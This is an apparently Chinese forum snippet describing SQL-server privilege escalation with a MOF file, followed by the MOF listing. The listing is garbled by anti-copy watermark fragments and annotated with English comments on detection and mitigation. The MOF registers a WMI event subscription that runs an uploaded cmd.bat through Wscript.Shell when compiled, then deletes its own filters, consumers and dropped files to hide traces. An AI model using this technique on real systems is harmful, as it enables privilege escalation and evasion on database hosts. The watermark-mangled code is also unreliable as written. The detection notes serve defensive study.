这个SQL提权MOF只能运行system目录下的文件，不能指定路径。
需要先把要运行的命令写入bat文件并上传到system32目录，然后再执行。
这个SQL提权MOF只能运行system目录下的文件，不能指定路径。
需要先把要运行的命令写入bat文件并上传到system32目录，然后再执行。
// NOTE(review): this listing is interleaved with forum anti-copy watermark
// noise (the "X0 y$ u7 \"-style fragments); as shown it is not a compilable
// MOF file. The comments below annotate what the visible MOF declares, for
// analysis and detection purposes.
//
// Overall shape: a WMI *permanent event subscription* compiled into
// root\cimv2 — two __EventFilter instances, two ActiveScriptEventConsumer
// instances (JScript) and two __FilterToConsumerBinding instances joining
// them, plus a throw-away class (MyClass547) whose instantiation at the end
// of the file is the trigger for the first filter.
//
// Detection: creation of __EventFilter / __EventConsumer-derived /
// __FilterToConsumerBinding instances is logged by Sysmon (event IDs 19, 20
// and 21) and by the Microsoft-Windows-WMI-Activity/Operational log (event
// 5861 for new permanent bindings). Hunting for consumers named "ASEC" /
// "qndASEC" and filters named "instfilt" / "qndfilt" in root\cimv2 would
// match this exact file; more generally, any ActiveScriptEventConsumer whose
// ScriptText instantiates Wscript.Shell is worth review.
//
// Mitigation for the delivery path described in the prose above: the MOF
// only works if the database service can write into the system directory,
// so running the DB service as a low-privilege account and restricting its
// file-write capability (if the database is MySQL, secure_file_priv and the
// FILE privilege) removes the prerequisite.
#pragma: F+ D) h& s/ [* Z8 v# F
// Everything below is compiled into root\cimv2 (not root\subscription), so
// subscription hunts that only look in root\subscription would miss it.
namespace("\\\\.\\root\\cimv2")% V. P. k3 O1 i
// Helper class used purely as a trigger: instfilt below watches for an
// instance of this class being created.
class8 t& Z! g% @3 }+ y v" B. T
MyClass547
' i4 T" K5 N0 b- k X2 A" \ { [key]% g7 R, w9 s6 M( e2 d- M4 J
string6 z0 H0 O6 a3 h5 W0 Y$ u7 \
Name;- O: O1 J6 b% j4 s0 I! Q$ Z
};) ~/ z+ {* z( n8 A- Z, X4 Y" B
// Declares the ActiveScriptEventConsumer class (derived from __EventConsumer)
// in this namespace, with Name, ScriptingEngine, ScriptFileName, ScriptText
// and KillTimeout properties — i.e. the consumer type that runs script text.
class
8 ?1 e+ l8 v5 S3 L& ^0 X# _ ActiveScriptEventConsumer9 k/ x! ?$ a( H
: __EventConsumer { [key]+ f2 O8 T* P' B, T3 X- K8 l
string8 w5 k* k' X+ B4 e1 l
Name; [not_null]2 ~* b- v( A3 Y/ R2 y
string- V+ m8 m; A% _) K M
ScriptingEngine; string
% U8 x: _. Q6 r+ e, l4 }1 X: I3 V ScriptFileName; [template]' C3 C! ] R' {! P" K2 Y# L
string
?' x% X0 v: Z1 u: Z+ H" w, C ScriptText; uint32 KillTimeout;
// Registers the provider that implements the consumer class (by CLSID) and
// binds it to the ActiveScriptEventConsumer class name.
3 a, Y: S( o. |& I }; instance of __Win32Provider as $P {2 @$ Q6 @' ] d5 s
Name
$ p- t, A$ d1 f; f =
4 z: x: m/ @) N "ActiveScriptEventConsumer"; CLSID =" }% F) c+ `1 z( Z- h
"{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";" \% J* I# _7 E$ c, }) t0 G/ a
PerUserInitialization, v% A# w( \5 s4 i% S' c' x
= TRUE;
) G6 F3 o8 g: o$ v" S3 i }; instance of __EventConsumerProviderRegistration { Provider
# S8 d6 S0 B7 Y0 \ = $P; ConsumerClassNames
* f% ?) j6 D, b" s+ r( r8 }5 u5 \ =, b( m& E2 q5 v1 U# K( e6 Y+ M
{"ActiveScriptEventConsumer"};
0 t! w) N5 c: K/ M8 O( D };- d5 Y7 O( k( f: W$ U Y3 y
// Consumer "ASEC": its JScript launches "cmd.bat" through Wscript.Shell
// (no path, hence the prose note that the file must sit in the system
// directory), then deletes the MyClass547 class, the "instfilt" filter and
// the "ASEC" consumer itself. The $bind binding is not deleted by this
// script; whether WMI removes it once its endpoints are gone is not shown
// here, so a dangling __FilterToConsumerBinding is a possible artifact.
Instance of ActiveScriptEventConsumer2 _' d" _7 l2 V) L, E
as $cons { Name4 z& J. z0 a" h( S! w" n; n3 h
=+ \: m# h, U; b8 k6 E x
"ASEC"; ScriptingEngine, j H1 V4 F. b) {( S, T
=. U# s) j. r9 G% Q6 g4 E% }
"JScript"; ScriptText
3 v4 R$ g3 S; [& Y$ X2 U* S2 e =
: Y" e8 u) D, T& F- I "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };
// Consumer "qndASEC": clean-up script. Deletes the compiled MOF from
// wbem\mof\good\hBsBa.mof (a relative path; presumably where the compiler
// moved the dropped file — TODO confirm), deletes cmd.bat, then removes
// the "qndfilt" filter and this consumer. Forensically, the presence or
// absence of hBsBa.mof and cmd.bat tells you whether this stage ran.
. D4 M% ~- {/ I) T Instance of ActiveScriptEventConsumer
9 y6 W5 g: v3 ~' a; x' _5 V as $cons2 { Name. \6 Z: z/ {: p6 {
=: y9 E0 P3 n [
"qndASEC"; ScriptingEngine+ X. x1 B$ B, n% K
=( N3 u& b: h$ g5 q' C, ^
"JScript"; ScriptText, V8 M" s1 @( H2 t9 j/ u3 h* Z D
=
7 ^, m0 d% V; Q( C& z3 [ "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
// Filter "instfilt": fires on creation of any MyClass547 instance — the
// instance declared at the very end of this file satisfies it, so compiling
// the MOF is itself the trigger.
; R5 \2 o1 e9 t T O+ l }; instance of __EventFilter as $Filt { Name. x( j G- ?0 l4 Z5 \6 c
=
: n4 z ~3 l6 F! E "instfilt"; Query0 O2 H, a, k" h1 j
=( e5 l* ~% p6 l' w& p; ?. W9 }" e
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
2 i/ w, |2 B2 Z2 U: \1 e =
// Filter "qndfilt": polls (WITHIN 1) for a Win32_Process whose Name equals
// "cmd.bat" being deleted. The first consumer launches the batch file via
// Wscript.Shell, so the resulting process object is presumably cmd.exe
// rather than "cmd.bat" — if so this filter never matches and the
// qndfilt/qndASEC subscription, hBsBa.mof and cmd.bat are left behind,
// which makes them durable indicators for responders (hedged: not verified
// here).
7 j8 x3 K. f; r* \4 N- @1 T$ @ "WQL"; }; instance of __EventFilter as $Filt2 { Name
5 n# z/ H3 K e# U! m; o [ =5 H6 H: I: D9 g1 ^. X+ {
"qndfilt"; Query
. P9 a$ q. S% G2 ^/ e2 { =
% O& W& a5 R- H( j) l "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage
" o/ J1 Z- |$ `* j: x& D$ A% L# | =; Q4 X5 m) T2 I0 M; c; N) I
// Bindings: instfilt -> ASEC (execution), qndfilt -> qndASEC (clean-up).
// These two __FilterToConsumerBinding instances are the objects Sysmon
// event 21 / WMI-Activity 5861 record.
"WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
+ n& m( z4 d7 K2 d; x3 z. z: I$ E i = $cons; Filter
6 d$ o0 s5 E3 i = $Filt;: x( i& }1 e& B7 M8 l0 J
}; instance of __FilterToConsumerBinding as $bind2 { Consumer8 S+ C4 @- Q" z g( r& S
= $cons2; Filter2 T) u+ [$ S- [. F! @; F' f& X
= $Filt2;
// Trigger: creating this MyClass547 instance raises the
// __InstanceCreationEvent that instfilt is waiting for.
( _. W. M" {" h, c% P! F }; instance of MyClass547
6 v6 L1 p3 E7 U( c5 ] o. y as $MyClass { Name* w' d! G! t6 Y( b# J7 B
=* X5 l/ D$ o0 o& s" i
"ClassConsumer";0 `, e3 q. ~, o6 p# u: B% j" o" k' Z
}; |